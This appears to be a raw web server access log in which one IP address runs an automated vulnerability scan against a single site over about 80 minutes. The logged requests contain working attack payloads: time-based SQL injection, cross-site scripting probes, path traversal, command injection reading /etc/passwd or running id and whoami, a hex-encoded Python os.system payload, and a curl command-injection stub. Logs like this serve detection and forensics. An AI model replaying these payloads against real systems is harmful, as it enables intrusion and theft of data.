"Mozilla/5.0 (Macintosh; Intel Mac OS X 17_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:04:33:06 -0400] "POST /rest/issueNav/1/issueTable HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.17" 154.84.62.234 - - [24/Apr/2025:04:34:14 -0400] "POST /plugins/servlet/gadgets/makeRequest HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:04:34:28 -0400] "GET /wp-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.16" 154.84.62.234 - - [24/Apr/2025:04:34:37 -0400] "GET /index.php/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:34:50 -0400] "POST /kindeditor/php/demo.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:04:34:55 -0400] "POST /php/demo.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:04:35:15 -0400] "POST /CDGServer3/ClientAjax HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:04:35:16 -0400] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 200 338 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/19.0.0 Version/17.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:04:35:34 -0400] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 200 0 "https://mgrokokbet.id/artifactory/webapp/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.21" 154.84.62.234 - - [24/Apr/2025:04:36:26 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:36:49 -0400] "POST /search/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:04:36:50 -0400] "POST /search/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.25" 154.84.62.234 - - [24/Apr/2025:04:37:58 -0400] "GET /wp-content/plugins/social-warfare/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" 154.84.62.234 - admin [24/Apr/2025:04:39:06 -0400] "POST /content/2w9rfcDKhKgGbEj3TNcXdTi6W1y 
HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - admin [24/Apr/2025:04:39:09 -0400] "POST /content/2w9rfcDKhKgGbEj3TNcXdTi6W1y.af.internalsubmit.json HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Ubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:04:39:14 -0400] "POST /mdm/client/v1/mdmLogUploader?udid=si%5C..%5C..%5C..%5Cwebapps%5CDesktopCentral%5C_chart&filename=logger.zip HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:04:39:15 -0400] "GET /backupsettings.dat HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:04:39:27 -0400] "POST /api/snapshots HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:04:42:09 -0400] "GET /objects/getImage.php?base64Url=YGlkID4geW9sa3cudHh0YA===&format=png HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.5.23" 154.84.62.234 - - [24/Apr/2025:04:42:13 -0400] "GET /objects/getImageMP4.php?base64Url=YGlkID4geW9sa3cudHh0YA===&format=jpg HTTP/1.1" 200 0 "-" "Mozilla/5.0 \\(Windows NT 10.0\\; Win64\\; x64\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Chrome/100.0.4896.60 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:42:18 -0400] "GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4geW9sa3cudHh0YA===&format=jpg HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:42:22 -0400] "GET /objects/yolkw.txt HTTP/1.1" 200 0 "-" 
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:42:44 -0400] "GET /index.php?route=/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 154.84.62.234 - - [24/Apr/2025:04:42:50 -0400] "GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:04:43:05 -0400] "POST /mailingupgrade.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.5.23" 154.84.62.234 - - [24/Apr/2025:04:46:03 -0400] "POST /service/rapture/session HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:04:46:10 -0400] "POST /service/rest/beta/repositories/bower/group HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:04:47:41 -0400] "POST /v2/api/product/manger/getInfo HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:49:28 -0400] "POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:04:51:05 -0400] "POST /cgi-bin/login.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:53:09 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:04:54:18 -0400] "GET 
/?cda'\"</script><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:04:55:16 -0400] "GET /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" 154.84.62.234 - - [24/Apr/2025:04:55:17 -0400] "GET /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.4.15" 154.84.62.234 - - [24/Apr/2025:04:55:29 -0400] "POST /module/ HTTP/1.1" 200 0 "https://mgrokokbet.idadmin/view:modules/load_module:users" "Mozilla/5.0 (CentOS; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:04:55:29 -0400] "POST /module/ HTTP/1.1" 200 0 "https://mgrokokbet.idadmin/view:modules/load_module:users" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:04:55:29 -0400] "POST /module/ HTTP/1.1" 200 0 "https://mgrokokbet.idadmin/view:modules/load_module:users" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:56:33 -0400] "GET /public/login.htm?type=probes HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:04:56:40 -0400] "GET /public/login.htm?type=requests HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.1" 154.84.62.234 - - [24/Apr/2025:04:56:47 -0400] "GET /public/login.htm?type=treestat HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15" 34.202.88.37 - - [24/Apr/2025:04:56:53 -0400] "GET /?NA HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, 
like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:56:58 -0400] "POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/616.16 (KHTML, like Gecko) Version/17.0.90 Safari/616.16" 154.84.62.234 - - [24/Apr/2025:04:57:51 -0400] "POST /context.json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.23" 154.84.62.234 - - [24/Apr/2025:04:59:12 -0400] "POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:05:00:09 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.63" 154.84.62.234 - - [24/Apr/2025:05:00:21 -0400] "GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2w9rffU7uukYIXpql2XmDGdkhPQ.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:04:38 -0400] "POST /mifs/.;/services/LogService HTTP/1.1" 403 1242 "https://mgrokokbet.id" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:04:38 -0400] "POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:05:05:27 -0400] "GET 
/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6e6335636d5a5764464e765432464f566a523653556f304d6e6454515556766358637a22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1" 200 0 "https://mgrokokbet.id/webadmin/admin/service_manager_data.php" "Mozilla/5.0 (Ubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:05:05:36 -0400] "GET /webadmin/out HTTP/1.1" 200 0 "https://mgrokokbet.id/webadmin/admin/service_manager_data.php" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:05:08:47 -0400] "POST /run HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:09:05 -0400] "GET /user/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:10:52 -0400] "POST /apisix/admin/routes HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.61" 154.84.62.234 - - [24/Apr/2025:05:10:59 -0400] "GET /2w9rfZdr2694Co1S7TRMWJ5LvWO?cmd=id HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:05:12:34 -0400] "POST /fuel/login/ HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.4.15" 154.84.62.234 - - [24/Apr/2025:05:12:34 -0400] "GET /fuel/pages/items/?search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1" 200 0 "https://mgrokokbet.id" 
"Mozilla/5.0 (Debian; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:05:12:34 -0400] "GET /fuel/login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:13:16 -0400] "GET /api/experimental/test HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:05:13:22 -0400] "GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:13:28 -0400] "POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:05:15:45 -0400] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:05:17:05 -0400] "GET /user/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:22:55 -0400] "GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Edtfy.txt HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.32 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:23:02 -0400] "GET /include/dtfy.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:05:24:02 -0400] "POST /lib/crud/userprocess.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) 
Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:05:24:08 -0400] "GET /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:24:14 -0400] "POST /lib/crud/userprocess.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:05:25:43 -0400] "GET /user/login.php HTTP/1.1" 200 0 "xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0" 154.84.62.234 - - [24/Apr/2025:05:27:50 -0400] "POST /cgi-bin/login.cgi HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:27:57 -0400] "POST /cgi-bin/system_log.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:05:28:20 -0400] "GET /global-protect/login.esp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.65" 154.84.62.234 - - [24/Apr/2025:05:29:31 -0400] "POST /login HTTP/1.1" 403 1242 "mgrokokbet.id/module/login/login.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.5.23" 154.84.62.234 - - [24/Apr/2025:05:33:19 -0400] "GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.1) AppleWebKit/618.27 (KHTML, like Gecko) Version/17.4 Safari/618.27" 154.84.62.234 - - [24/Apr/2025:05:33:23 -0400] "POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 
Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:05:33:23 -0400] "POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:34:02 -0400] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:05:34:08 -0400] "GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:05:35:47 -0400] "POST /jars/upload HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:05:35:51 -0400] "GET /admin/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:35:58 -0400] "GET /admin/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:05:35:58 -0400] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:36:18 -0400] "POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/616.16 (KHTML, like Gecko) Version/17.0.90 Safari/616.16" 162.248.72.168 - - 
[24/Apr/2025:05:36:25 -0400] "GET /about.php?ac=change_about_path&api=&path=&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:36:35 -0400] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:37:35 -0400] "POST /var HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Knoppix; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:05:38:33 -0400] "GET /whoAmI/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.2.21" 154.84.62.234 - - [24/Apr/2025:05:38:41 -0400] "GET /whoAmI/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3_7; en) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.7 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:05:42:03 -0400] "GET /?p=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.61" 154.84.62.234 - - [24/Apr/2025:05:43:36 -0400] "GET /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 108.136.206.220 - - [24/Apr/2025:05:43:50 -0400] "GET /admin/assets/tinymce/filemanager/filemanager/dialog.php HTTP/1.1" 200 0 "-" "Go-http-client/1.1" 154.84.62.234 - - [24/Apr/2025:05:45:39 -0400] "GET /wp-content/plugins/event-espresso-core-reg/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:05:45:40 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) 
AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.23" 154.84.62.234 - - [24/Apr/2025:05:45:48 -0400] "GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:05:47:09 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:05:47:33 -0400] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:49:29 -0400] "GET /tiki-login_scr.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:49:42 -0400] "GET /tiki-login_scr.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:05:49:48 -0400] "POST /api/graphql HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.7 (KHTML, like Gecko) Version/17.3.74 Safari/617.7" 154.84.62.234 - - [24/Apr/2025:05:49:49 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:05:49:53 -0400] "GET /tiki-index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0" 154.84.62.234 - - [24/Apr/2025:05:49:55 -0400] "POST /login.htm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:05:50:14 -0400] "POST /cgi-bin/system_mgr.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - 
- [24/Apr/2025:05:50:25 -0400] "POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:05:50:56 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:05:51:31 -0400] "GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" 176.97.123.28 - - [24/Apr/2025:05:51:52 -0400] "GET 